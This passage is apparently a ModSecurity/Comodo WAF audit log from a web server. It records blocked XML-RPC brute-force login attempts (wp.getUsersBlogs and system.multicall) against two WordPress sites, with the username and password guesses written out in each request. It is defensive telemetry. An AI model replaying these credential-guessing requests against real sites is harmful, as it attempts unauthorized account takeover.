(Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b7d6851-Z-- --da489678-A-- [05/Jun/2025:17:09:43 +0700] aEFs51wdJdhOudw5hdz5NQAAAII 103.236.140.4 46806 103.236.140.4 8181 --da489678-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 173.212.221.77 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 173.212.221.77 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --da489678-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin2007 --da489678-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da489678-E-- --da489678-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 173.212.221.77 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749118183758227 4394 (- - -) Stopwatch2: 1749118183758227 4394; combined=3443, p1=360, p2=2905, p3=0, p4=0, p5=107, sr=80, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da489678-Z-- --973e4608-A-- [05/Jun/2025:17:10:00 +0700] aEFs-FwdJdhOudw5hdz5PAAAAJM 103.236.140.4 46830 103.236.140.4 8181 --973e4608-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --973e4608-C-- wp.getUsersBlogs kasubagtu 741852963 --973e4608-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --973e4608-E-- --973e4608-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (71+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118200147780 5065 (- - -) Stopwatch2: 1749118200147780 5065; combined=3730, p1=457, p2=3105, p3=0, p4=0, p5=99, sr=85, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --973e4608-Z-- --7968612b-A-- [05/Jun/2025:17:11:00 +0700] aEFtNOth7G2xELALzPZXKwAAAMU 103.236.140.4 46920 103.236.140.4 8181 --7968612b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 237 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --7968612b-C-- wp.getUsersBlogs administrator OpF^MJrUK$SzYcOrfG --7968612b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7968612b-E-- --7968612b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118260267569 4577 (- - -) Stopwatch2: 1749118260267569 4577; combined=3342, p1=363, p2=2797, p3=0, p4=0, p5=104, sr=77, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7968612b-Z-- --e20a7d5f-A-- [05/Jun/2025:17:12:00 +0700] aEFtcH-K7ToMdu-YSIJSlAAAAAw 103.236.140.4 47000 103.236.140.4 8181 --e20a7d5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e20a7d5f-C-- wp.getUsersBlogs administrator qwerty --e20a7d5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e20a7d5f-E-- --e20a7d5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118320346835 2738 (- - -) Stopwatch2: 1749118320346835 2738; combined=2013, p1=225, p2=1684, p3=0, p4=0, p5=61, sr=51, sw=43, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e20a7d5f-Z-- --30cc217e-A-- [05/Jun/2025:17:13:00 +0700] aEFtrOth7G2xELALzPZXRwAAAMs 103.236.140.4 47148 103.236.140.4 8181 --30cc217e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 237 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --30cc217e-C-- wp.getUsersBlogs administrator administrator@2000 --30cc217e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30cc217e-E-- --30cc217e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (65+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118380371359 4475 (- - -) Stopwatch2: 1749118380371359 4475; combined=3343, p1=362, p2=2812, p3=0, p4=0, p5=99, sr=82, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30cc217e-Z-- --49c65f57-A-- [05/Jun/2025:17:13:30 +0700] aEFtyuth7G2xELALzPZXaAAAANQ 103.236.140.4 47228 103.236.140.4 8181 --49c65f57-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --49c65f57-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminJames@12345 --49c65f57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49c65f57-E-- --49c65f57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749118410328066 4588 (- - -) Stopwatch2: 1749118410328066 4588; combined=3641, p1=380, p2=3041, p3=0, p4=0, p5=155, sr=98, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49c65f57-Z-- --e420ee41-A-- [05/Jun/2025:17:14:00 +0700] aEFt6Oth7G2xELALzPZXeQAAANU 103.236.140.4 47266 103.236.140.4 8181 --e420ee41-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e420ee41-C-- wp.getUsersBlogs administrator Marketing2014 --e420ee41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e420ee41-E-- --e420ee41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (43+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118440323554 4325 (- - -) Stopwatch2: 1749118440323554 4325; combined=3350, p1=342, p2=2843, p3=0, p4=0, p5=96, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e420ee41-Z-- --82bd3b5f-A-- [05/Jun/2025:17:15:01 +0700] aEFuJeth7G2xELALzPZXtAAAAMg 103.236.140.4 47468 103.236.140.4 8181 --82bd3b5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --82bd3b5f-C-- wp.getUsersBlogs administrator Admin@321 --82bd3b5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82bd3b5f-E-- --82bd3b5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (87+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118501078615 5297 (- - -) Stopwatch2: 1749118501078615 5297; combined=3807, p1=452, p2=3185, p3=0, p4=0, p5=100, sr=99, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82bd3b5f-Z-- --e2938318-A-- [05/Jun/2025:17:16:01 +0700] aEFuYX-K7ToMdu-YSIJS5wAAABQ 103.236.140.4 47634 103.236.140.4 8181 --e2938318-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e2938318-C-- wp.getUsersBlogs administrator 1234!@#$ --e2938318-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2938318-E-- --e2938318-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (73+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118561171853 5387 (- - -) Stopwatch2: 1749118561171853 5387; combined=3818, p1=458, p2=3161, p3=0, p4=0, p5=114, sr=98, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2938318-Z-- --04f0ef41-A-- [05/Jun/2025:17:17:01 +0700] aEFuneth7G2xELALzPZX6wAAANE 103.236.140.4 47760 103.236.140.4 8181 --04f0ef41-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --04f0ef41-C-- wp.getUsersBlogs administrator webadmin --04f0ef41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04f0ef41-E-- --04f0ef41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (49+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118621240927 5276 (- - -) Stopwatch2: 1749118621240927 5276; combined=3757, p1=486, p2=3104, p3=0, p4=0, p5=98, sr=117, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04f0ef41-Z-- --5a8f3f7b-A-- [05/Jun/2025:17:17:29 +0700] aEFuuSrHpfaS2Cuwh8UFugAAAEU 103.236.140.4 47856 103.236.140.4 8181 --5a8f3f7b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5a8f3f7b-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix159 --5a8f3f7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a8f3f7b-E-- --5a8f3f7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749118649263567 4459 (- - -) Stopwatch2: 1749118649263567 4459; combined=3453, p1=370, p2=2913, p3=0, p4=0, p5=100, sr=82, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a8f3f7b-Z-- --73ff9c18-A-- [05/Jun/2025:17:18:02 +0700] aEFu2lwdJdhOudw5hdz5pgAAAJA 103.236.140.4 47948 103.236.140.4 8181 --73ff9c18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --73ff9c18-C-- wp.getUsersBlogs administrator security --73ff9c18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73ff9c18-E-- --73ff9c18-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (86+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118682532393 5451 (- - -) Stopwatch2: 1749118682532393 5451; combined=3858, p1=460, p2=3218, p3=0, p4=0, p5=106, sr=90, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73ff9c18-Z-- --e7a46c32-A-- [05/Jun/2025:17:19:02 +0700] aEFvFirHpfaS2Cuwh8UFvQAAAEI 103.236.140.4 48048 103.236.140.4 8181 --e7a46c32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e7a46c32-C-- wp.getUsersBlogs administrator admin520 --e7a46c32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7a46c32-E-- --e7a46c32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118742048858 5275 (- - -) Stopwatch2: 1749118742048858 5275; combined=3794, p1=506, p2=3114, p3=0, p4=0, p5=102, sr=92, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7a46c32-Z-- --d16f2b11-A-- [05/Jun/2025:17:20:12 +0700] aEFvXFwdJdhOudw5hdz6GQAAAJA 103.236.140.4 48228 103.236.140.4 8181 --d16f2b11-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d16f2b11-C-- wp.getUsersBlogs administrator 1235698 --d16f2b11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d16f2b11-E-- --d16f2b11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (78+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118812162158 5422 (- - -) Stopwatch2: 1749118812162158 5422; combined=3750, p1=464, p2=3117, p3=0, p4=0, p5=100, sr=93, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d16f2b11-Z-- --ded99d1d-A-- [05/Jun/2025:17:21:12 +0700] aEFvmOth7G2xELALzPZYEgAAAMk 103.236.140.4 48330 103.236.140.4 8181 --ded99d1d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --ded99d1d-C-- wp.getUsersBlogs administrator !@#123qwe --ded99d1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ded99d1d-E-- --ded99d1d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (41+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118872973263 5523 (- - -) Stopwatch2: 1749118872973263 5523; combined=3858, p1=459, p2=3223, p3=0, p4=0, p5=104, sr=93, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ded99d1d-Z-- --5d6a6749-A-- [05/Jun/2025:17:22:12 +0700] aEFv1FwdJdhOudw5hdz6YgAAAIw 103.236.140.4 48436 103.236.140.4 8181 --5d6a6749-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --5d6a6749-C-- wp.getUsersBlogs administrator superman --5d6a6749-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d6a6749-E-- --5d6a6749-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (45+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: 